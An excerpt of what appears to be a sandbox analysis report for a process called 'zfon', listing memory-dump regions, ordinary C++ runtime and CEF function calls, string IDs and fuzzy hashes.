                                                                                                • Instruction Fuzzy Hash: FEF0D412A1C68A91EBD0FF64CC522FD5620AF68748FC45D31E66E450EB9F18D54AC3B2
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 211107550-393685449
                                                                                                • Opcode ID: 78c6e7fb34b0392c5f88638df05ce5e29abaa94eb5bf539d305eb9caf3e55ea3
                                                                                                • Instruction ID: 3bdf394af6a9a6f182ba04e17fa910242469319ff6672a6f332c788f892bc7c6
                                                                                                • Opcode Fuzzy Hash: 78c6e7fb34b0392c5f88638df05ce5e29abaa94eb5bf539d305eb9caf3e55ea3
                                                                                                • Instruction Fuzzy Hash: C1E1A37A9087818BF7389FA8D4822AD7BA4FB4578CF146136DB8D57696DF38E481C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 211107550-393685449
                                                                                                • Opcode ID: 6f42a4adf4f654b9ccc7c674dc7e4c3ff1af33df0a1f36dd7bc44f2aa948d2c7
                                                                                                • Instruction ID: 53c79c87c2f89fd0243228c05788bab3e3f1e1902dfd63a4e4a1d43f78facdc3
                                                                                                • Opcode Fuzzy Hash: 6f42a4adf4f654b9ccc7c674dc7e4c3ff1af33df0a1f36dd7bc44f2aa948d2c7
                                                                                                • Instruction Fuzzy Hash: EEE19B73A187928AE7609BB9D4A02AD77A1FB45788F180235DB8D57B96CF3CF491C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$free$mallocmemcpymemmove
                                                                                                • String ID: c
                                                                                                • API String ID: 2367844967-112844655
                                                                                                • Opcode ID: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                • Instruction ID: 3f89a8823c476170007fea590707ff1ef95e6eceb310cbd2d8dbb99c6914b472
                                                                                                • Opcode Fuzzy Hash: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                • Instruction Fuzzy Hash: 0FD17E22B08B829AFB15EF64D8403EC67B1EB49B88F844035DE5D27AD9CF39D415C3A5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_allocmemset
                                                                                                • String ID: www.battle.net
                                                                                                • API String ID: 3617466678-3493060400
                                                                                                • Opcode ID: c7e2bc2cc281e77f54a6eaeeaf87b570be9d95c1c557086e9584b24d8a358c3a
                                                                                                • Instruction ID: 2594e52bb039eaf9bc5bed240af8d204c3369a82dc2c920272a91c25bcf21447
                                                                                                • Opcode Fuzzy Hash: c7e2bc2cc281e77f54a6eaeeaf87b570be9d95c1c557086e9584b24d8a358c3a
                                                                                                • Instruction Fuzzy Hash: 1991BF2260974285EF74AF14D8403B9A7B1EB84BD8F994131DA6D43AECEF3CD845C7A0
                                                                                                APIs
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B9105C89
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9105D10
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105D4F
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105D69
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9105E3A
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: ,$false$true
                                                                                                • API String ID: 4163931919-760133229
                                                                                                • Opcode ID: c0f2ef7070c1f49761d02a5703fcc8a9b7b3e5ed5308bd7948f2b64a82fafe73
                                                                                                • Instruction ID: 06360f17a534aa0420ba9ae0590860670d022e5e23bb7cb6dad3381d0f75d052
                                                                                                • Opcode Fuzzy Hash: c0f2ef7070c1f49761d02a5703fcc8a9b7b3e5ed5308bd7948f2b64a82fafe73
                                                                                                • Instruction Fuzzy Hash: 21515F22618BC192D621CF25F4402AAB774FB897A4F505226EBDE077A9EF3CD145D740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                • API String ID: 2943138195-2239912363
                                                                                                • Opcode ID: 39f267e24cea2a085efea57700c8f0511391629eccd065b63ffe6c0b5b6c4cba
                                                                                                • Instruction ID: 48ac059b450e12870da3120f6627efb27affe66e3780557d9262b381828ee135
                                                                                                • Opcode Fuzzy Hash: 39f267e24cea2a085efea57700c8f0511391629eccd065b63ffe6c0b5b6c4cba
                                                                                                • Instruction Fuzzy Hash: F45158A2E18B569CFB12CFA8E8602BD77B1BB08788F544136DB4D16B95DF7CA084C750
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initstd::ios_base::_$AddstdExceptionThrowsetvbufstd::ios_base::failure::failurestd::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 692481045-1866435925
                                                                                                • Opcode ID: fd2f3828b474fe88a08b624c1155f3347718e21b58a1bf8b771f14d77974cb8c
                                                                                                • Instruction ID: 0643a3c8f734ec3be961e70fa18f13d63121746974d49c064a78751b23d6edb5
                                                                                                • Opcode Fuzzy Hash: fd2f3828b474fe88a08b624c1155f3347718e21b58a1bf8b771f14d77974cb8c
                                                                                                • Instruction Fuzzy Hash: 30414A32A18B86D6EF548F29D4413A923A0FB54B88F544135CB4C4B759EF3DD6A5CB80
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 1099746521-1866435925
                                                                                                • Opcode ID: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                • Instruction ID: 52a0e4b738551af5fa628c038aa480601b148bb19e6cb8f33c916f66e1d48503
                                                                                                • Opcode Fuzzy Hash: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                • Instruction Fuzzy Hash: 3B21F461E1D9CBA2EE149F0CD8515F92320EF907C8F980075DB2E46691EF2DE647C750
                                                                                                APIs
                                                                                                • memcmp.VCRUNTIME140 ref: 00007FF7F96E9F9A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FC9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FD9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FE9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FF6
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA099
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA0A9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA0B9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA0C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 807481086-0
                                                                                                • Opcode ID: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                • Instruction ID: fa702d49b1434d1fcda619d7ff455922fba060d5442205cfcbed4b976a4878ca
                                                                                                • Opcode Fuzzy Hash: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                • Instruction Fuzzy Hash: 8F61EF22908B4694FB54BF15E848369A3B2EB85BE4F840135DB6D037D9CF7DE881C3A5
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24CB
                                                                                                  • Part of subcall function 00007FF7F96E2470: memcpy.VCRUNTIME140(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24E2
                                                                                                  • Part of subcall function 00007FF7F96E2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24FA
                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBB6F
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBB8C
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBBAF
                                                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBBE9
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBBFF
                                                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBC2C
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBC46
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBC60
                                                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF7F96EBC7E
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF7F96EBC93
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$freememmove$malloc
                                                                                                • String ID:
                                                                                                • API String ID: 4013446061-0
                                                                                                • Opcode ID: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                • Instruction ID: 7a3c2f78a030d08d517449a9973a8cc535acafb0d66d4e1992eb1e9063884e0a
                                                                                                • Opcode Fuzzy Hash: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                • Instruction Fuzzy Hash: E9518166609B8141DB11EF16E94436AE771EB89FE4F940235EE6E07BDDEE3DD0408350
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                • Instruction ID: eb068f9b8adea2ecc317347446103d948f618bac2d3cb969a6e038803b15bfa3
                                                                                                • Opcode Fuzzy Hash: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                • Instruction Fuzzy Hash: F1715876A08A8695EB649F1DD4913BC3761FB80BC4F548136CB1E577A4EF2DE846D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                • Instruction ID: cbb8a769a19f2f91afbaefd2d1082af35d0989d854f7d529d08aea0d9c4de274
                                                                                                • Opcode Fuzzy Hash: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                • Instruction Fuzzy Hash: 7B714672A08A8691EB149F1DD4903BC37A0EB84BC4F558136DB5E937E4EF2DE886D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                • API String ID: 1852475696-928371585
                                                                                                • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                • Instruction ID: 3acb0bf8bf7f44c560cb9864c3f68461de8b158a7736af1c417171afaa931eb0
                                                                                                • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                • Instruction Fuzzy Hash: E851A362B29A46A2EE20CB98E8A16B97362FF44BC4F40453ADB4D47755DF3CF505C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
